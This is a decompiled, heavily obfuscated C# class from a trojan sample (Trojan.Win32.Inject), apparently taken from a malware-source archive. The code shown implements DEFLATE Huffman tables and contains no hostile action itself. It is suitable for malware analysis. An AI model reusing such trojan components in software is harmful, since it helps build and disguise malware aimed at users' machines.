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MalwareSourceCode/MSIL/Trojan/Win32/I/Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515/.cs

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auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
using System;
using System.Collections;
internal sealed class \uE00D
{
internal const int \uE000 = 32768;
internal const int \uE001 = 258;
internal const int \uE002 = 285;
internal const int \uE003 = 287;
internal const int \uE004 = 29;
internal const int \uE005 = 31;
internal const int \uE006 = 15;
internal const int \uE007 = 256;
internal const int \uE008 = 0;
internal const int \uE009 = 1;
internal const int \uE00A = 2;
internal const int \uE00B = 16;
internal const int \uE00C = 18;
internal const int \uE00D = 16;
internal const int \uE00E = 17;
internal const int \uE00F = 18;
private const int \uE010 = 257;
internal static \uE00F[] \uE011 = new \uE00F[288];
internal static \uE00F[] \uE012 = new \uE00F[32];
internal static \uE011 \uE013;
internal static readonly int[] \uE014 = new int[19];
private static readonly int[] \uE015;
private static readonly int[] \uE016;
private static readonly int[] \uE017;
private static readonly int[] \uE018;
static \uE00D()
{
\uE00D.\uE014[0] = 16;
\uE00D.\uE014[1] = 17;
\uE00D.\uE014[2] = 18;
\uE00D.\uE014[4] = 8;
\uE00D.\uE014[5] = 7;
\uE00D.\uE014[6] = 9;
\uE00D.\uE014[7] = 6;
\uE00D.\uE014[8] = 10;
\uE00D.\uE014[9] = 5;
\uE00D.\uE014[10] = 11;
\uE00D.\uE014[11] = 4;
\uE00D.\uE014[12] = 12;
\uE00D.\uE014[13] = 3;
\uE00D.\uE014[14] = 13;
\uE00D.\uE014[15] = 2;
\uE00D.\uE014[16] = 14;
\uE00D.\uE014[17] = 1;
\uE00D.\uE014[18] = 15;
\uE00D.\uE015 = new int[29];
\uE00D.\uE015[0] = 3;
\uE00D.\uE015[1] = 4;
\uE00D.\uE015[2] = 5;
\uE00D.\uE015[3] = 6;
\uE00D.\uE015[4] = 7;
\uE00D.\uE015[5] = 8;
\uE00D.\uE015[6] = 9;
\uE00D.\uE015[7] = 10;
\uE00D.\uE015[8] = 11;
\uE00D.\uE015[9] = 13;
\uE00D.\uE015[10] = 15;
\uE00D.\uE015[11] = 17;
\uE00D.\uE015[12] = 19;
\uE00D.\uE015[13] = 23;
\uE00D.\uE015[14] = 27;
\uE00D.\uE015[15] = 31;
\uE00D.\uE015[16] = 35;
\uE00D.\uE015[17] = 43;
\uE00D.\uE015[18] = 51;
\uE00D.\uE015[19] = 59;
\uE00D.\uE015[20] = 67;
\uE00D.\uE015[21] = 83;
\uE00D.\uE015[22] = 99;
\uE00D.\uE015[23] = 115;
\uE00D.\uE015[24] = 131;
\uE00D.\uE015[25] = 163;
\uE00D.\uE015[26] = 195;
\uE00D.\uE015[27] = 227;
\uE00D.\uE015[28] = 258;
\uE00D.\uE016 = new int[29];
int index1 = 8;
int num1 = 0;
for (; index1 < 28; ++index1)
{
if (index1 % 4 == 0)
++num1;
\uE00D.\uE016[index1] = num1;
}
\uE00D.\uE017 = new int[30];
\uE00D.\uE017[0] = 1;
\uE00D.\uE017[1] = 2;
\uE00D.\uE017[2] = 3;
\uE00D.\uE017[3] = 4;
\uE00D.\uE017[4] = 5;
\uE00D.\uE017[5] = 7;
\uE00D.\uE017[6] = 9;
\uE00D.\uE017[7] = 13;
\uE00D.\uE017[8] = 17;
\uE00D.\uE017[9] = 25;
\uE00D.\uE017[10] = 33;
\uE00D.\uE017[11] = 49;
\uE00D.\uE017[12] = 65;
\uE00D.\uE017[13] = 97;
\uE00D.\uE017[14] = 129;
\uE00D.\uE017[15] = 193;
\uE00D.\uE017[16] = 257;
\uE00D.\uE017[17] = 385;
\uE00D.\uE017[18] = 513;
\uE00D.\uE017[19] = 769;
\uE00D.\uE017[20] = 1025;
\uE00D.\uE017[21] = 1537;
\uE00D.\uE017[22] = 2049;
\uE00D.\uE017[23] = 3073;
\uE00D.\uE017[24] = 4097;
\uE00D.\uE017[25] = 6145;
\uE00D.\uE017[26] = 8193;
\uE00D.\uE017[27] = 12289;
\uE00D.\uE017[28] = 16385;
\uE00D.\uE017[29] = 24577;
\uE00D.\uE018 = new int[30];
int index2 = 4;
int num2 = 0;
for (; index2 < 30; ++index2)
{
if (index2 % 2 == 0)
++num2;
\uE00D.\uE018[index2] = num2;
}
for (int index3 = 0; index3 <= 143; ++index3)
{
\uE00D.\uE011[index3].\uE000 = 48 + index3;
\uE00D.\uE011[index3].\uE001 = 8;
}
for (int index4 = 144; index4 <= (int) byte.MaxValue; ++index4)
{
\uE00D.\uE011[index4].\uE000 = 400 + index4 - 144;
\uE00D.\uE011[index4].\uE001 = 9;
}
for (int index5 = 256; index5 <= 279; ++index5)
{
\uE00D.\uE011[index5].\uE000 = index5 - 256;
\uE00D.\uE011[index5].\uE001 = 7;
}
for (int index6 = 280; index6 <= 287; ++index6)
{
\uE00D.\uE011[index6].\uE000 = 192 + index6 - 280;
\uE00D.\uE011[index6].\uE001 = 8;
}
for (int index7 = 0; index7 <= 31; ++index7)
{
\uE00D.\uE012[index7].\uE000 = index7;
\uE00D.\uE012[index7].\uE001 = 5;
}
\uE00D.\uE013 = \uE00D.\uE000(\uE00D.\uE011, \uE00D.\uE012);
}
internal static int \uE002(int[] _param0, int[] _param1)
{
int num = 0;
for (int index = 0; index < _param0.Length; ++index)
num += _param0[index] * _param1[index];
return num;
}
internal static int \uE003(int[] _param0, int[] _param1)
{
int num = 0;
for (int index = 0; index < _param0.Length; ++index)
num += _param0[index] * \uE00D.\uE011[index].\uE001;
for (int index = 0; index < _param1.Length; ++index)
num += _param1[index] * \uE00D.\uE012[index].\uE001;
return num;
}
internal static \uE00F[] \uE000(int[] _param0)
{
\uE00F[] objArray = new \uE00F[_param0.Length];
for (int index = 0; index < _param0.Length; ++index)
objArray[index].\uE001 = _param0[index];
\uE00D.\uE000(objArray);
return objArray;
}
internal static void \uE000(\uE00F[] _param0)
{
int num1 = _param0[0].\uE001;
for (int index = 1; index < _param0.Length; ++index)
{
if (num1 < _param0[index].\uE001)
num1 = _param0[index].\uE001;
}
int[] numArray1 = new int[num1 + 1];
for (int index = 0; index < _param0.Length; ++index)
++numArray1[_param0[index].\uE001];
int[] numArray2 = new int[num1 + 1];
int num2 = 0;
numArray1[0] = 0;
for (int index = 1; index <= num1; ++index)
{
num2 = num2 + numArray1[index - 1] << 1;
numArray2[index] = num2;
}
for (int index1 = 0; index1 < _param0.Length; ++index1)
{
int index2 = _param0[index1].\uE001;
if (index2 != 0)
{
_param0[index1].\uE000 = numArray2[index2];
++numArray2[index2];
}
}
}
internal static \uE011 \uE000(\uE00F[] _param0, \uE00F[] _param1) => new \uE011()
{
\uE000 = \uE00D.\uE000(_param0),
\uE001 = \uE00D.\uE000(_param1)
};
internal static \uE010 \uE000(\uE00F[] _param0)
{
\uE00D.\uE009[] objArray = new \uE00D.\uE009[_param0.Length];
int num = 0;
for (int index = 0; index < _param0.Length; ++index)
{
if (_param0[index].\uE001 > 0)
{
\uE00D.\uE009 obj = new \uE00D.\uE009();
ref \uE00D.\uE009 local = ref obj;
obj.\uE000 = _param0[index];
obj.\uE001 = (ushort) index;
objArray[num++] = obj;
}
}
if (_param0.Length < 1)
throw new InvalidOperationException();
return \uE00D.\uE000(objArray, num, 0, 0);
}
private static \uE010 \uE000(
\uE00D.\uE009[] _param0,
int _param1,
int _param2,
int _param3)
{
\uE00D.\uE009[] objArray1 = new \uE00D.\uE009[_param1];
\uE00D.\uE009[] objArray2 = new \uE00D.\uE009[_param1];
\uE010 obj1 = new \uE010();
obj1.\uE000 = false;
int num1;
int num2 = num1 = 0;
for (int index = 0; index < _param1; ++index)
{
\uE00D.\uE009 obj2 = _param0[index];
if (obj2.\uE000.\uE001 == _param3 && obj2.\uE000.\uE000 == _param2)
{
obj1.\uE000 = true;
obj1.\uE001 = obj2.\uE001;
}
else if ((obj2.\uE000.\uE000 >> obj2.\uE000.\uE001 - _param3 - 1 & 1) != 0)
objArray2[num2++] = obj2;
else
objArray1[num1++] = obj2;
}
if (obj1.\uE000)
{
if (num2 > 0 || num1 > 0)
throw new InvalidOperationException();
}
else
{
if (num1 > 0)
obj1.\uE002 = \uE00D.\uE000(objArray1, num1, _param2 << 1, _param3 + 1);
if (num2 > 0)
obj1.\uE003 = \uE00D.\uE000(objArray2, num2, _param2 << 1 | 1, _param3 + 1);
}
return obj1;
}
internal static void \uE00A(int _param0, out int _param1, out int _param2)
{
_param1 = \uE00D.\uE015[_param0 - 257];
_param2 = \uE00D.\uE016[_param0 - 257];
}
internal static void \uE00B(int _param0, out int _param1, out int _param2, out int _param3)
{
int index = Array.BinarySearch<int>(\uE00D.\uE015, _param0);
if (index < 0)
index = ~index - 1;
_param1 = index + 257;
_param2 = _param0 - \uE00D.\uE015[index];
_param3 = \uE00D.\uE016[index];
}
internal static void \uE00B(int _param0, out int _param1, out int _param2)
{
_param1 = \uE00D.\uE017[_param0];
_param2 = \uE00D.\uE018[_param0];
}
internal static void \uE00C(int _param0, out int _param1, out int _param2, out int _param3)
{
int index = Array.BinarySearch<int>(\uE00D.\uE017, _param0);
if (index < 0)
index = ~index - 1;
_param1 = index;
_param2 = _param0 - \uE00D.\uE017[index];
_param3 = \uE00D.\uE018[index];
}
internal static int[] \uE000(int[] _param0, int _param1) => \uE00E.\uE002(_param0, _param1);
internal static int[] \uE000(int[] _param0) => \uE00E.\uE002(_param0, 15);
internal static int \uE000(int _param0)
{
switch (_param0)
{
case 16:
return 2;
case 17:
return 3;
case 18:
return 7;
default:
return 0;
}
}
internal static int[] \uE000(int[] _param0, int _param1, int _param2)
{
ArrayList arrayList = new ArrayList();
int num1 = 0;
while (num1 < _param2)
{
if (_param0[_param1 + num1] == 0)
{
int num2 = 0;
do
{
++num2;
}
while (num1 + num2 < _param2 && num2 < 138 && _param0[_param1 + num1 + num2] == 0);
if (num2 < 3)
{
if (num2 >= 1)
arrayList.Add((object) 0);
if (num2 >= 2)
arrayList.Add((object) 0);
}
else if (num2 < 11)
{
arrayList.Add((object) 17);
arrayList.Add((object) (num2 - 3));
}
else
{
arrayList.Add((object) 18);
arrayList.Add((object) (num2 - 11));
}
num1 += num2;
}
else
{
int num3 = _param0[_param1 + num1++];
arrayList.Add((object) num3);
int num4 = 0;
while (num1 + num4 < _param2 && num4 < 6 && _param0[_param1 + num1 + num4] == num3)
++num4;
if (num4 >= 3)
{
arrayList.Add((object) 16);
arrayList.Add((object) (num4 - 3));
num1 += num4;
}
}
}
return (int[]) arrayList.ToArray(typeof (int));
}
private struct \uE009
{
internal \uE00F \uE000;
internal ushort \uE001;
}
}
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